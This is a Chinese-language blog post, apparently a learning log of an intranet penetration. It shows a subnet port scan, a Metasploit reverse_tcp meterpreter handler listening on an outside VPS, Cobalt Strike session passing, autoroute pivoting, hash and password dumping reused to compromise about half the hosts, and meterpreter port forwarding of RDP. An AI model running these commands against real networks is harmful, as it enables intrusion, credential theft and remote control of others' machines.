前言

由于处于接触内网渗透初期,所以对一些实战过程进行一些简单的记录,以巩固所学知识及工具的使用。

不谈论如何getshell,只从已经获取内网某台主机权限开始记录内网渗透的过程。

探测内网存活主机

利用portscan扫描内网存活的主机并探测开放的端口。

1
portscan 10.0.15.0/24 445,3389,139,80,8080 arp 10

(当时忘记截图,图为过后截的。)

大部分主机都开了445端口,因此先挂上msf骚一波内网的ms17-010。

MS17-010

外网msf监听服务器8989端口,在cs中设置windows/foreign/reverse_tcp,host填写msf的ip,port为msf监听的端口。

1
2
3
4
5
6
7
8
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost vps_ip
lhost => vps_ip
msf exploit(handler) > set lport 8989
lport => 8989
msf exploit(handler) > exploit -j

图片源自网络,侵删。

设置完成后,选中要反弹会话的目标主机,右键选择Spawn(增加会话),选择刚添加的监听器。msf服务器就会获得该目标主机的会话(meterpreter)。

查看路由,添加路由:

1
run get_local_subnets
1
run autoroute -s 10.0.15.0/24

扫描存在ms17010漏洞的主机

不知道为什么这里反弹shell没有成功,感觉msf自带的ms17010利用功能不太好用。

hashdump,getpass

利用cs抓取已获取权限主机(10.0.15.23)的密码或者hash(hash也可以利用)。读取完成后,选择10.0.15.11这台主机点击登录,利用.23这台主机的凭证登录,等一会发现11这台主机上线。

同样的方法内网近一半主机沦陷。

登录内网主机

准备登录到内网主机,对内网的其他机器进行渗透,大多服务器都开启了web服务,安装了远程控制软件等。可以利用常规web渗透手段对内网其他主机进行渗透,或者留后门键盘记录,嗅探等,来达到获取其他主机权限目的。感觉没必要太深入就到此为止了。

利用msf端口转发将内网的远程登陆端口转发出来。首先在webshell中找到远程连接的端口号。

1
tasklist /svc

找到TermService对应的pid。

1
netstat -ano

找到此pid对应的端口号,该端口号为远程登陆的端口号。

1
meterpreter > portfwd add -l 6868 -r 127.0.0.1 -p 3389 

提交漏洞通知管理人员。

总结

毫无技术含量的一次渗透,仅仅是熟悉了工具的使用,会沉淀更多的渗透技巧,分享并记录,以促进自己的学习。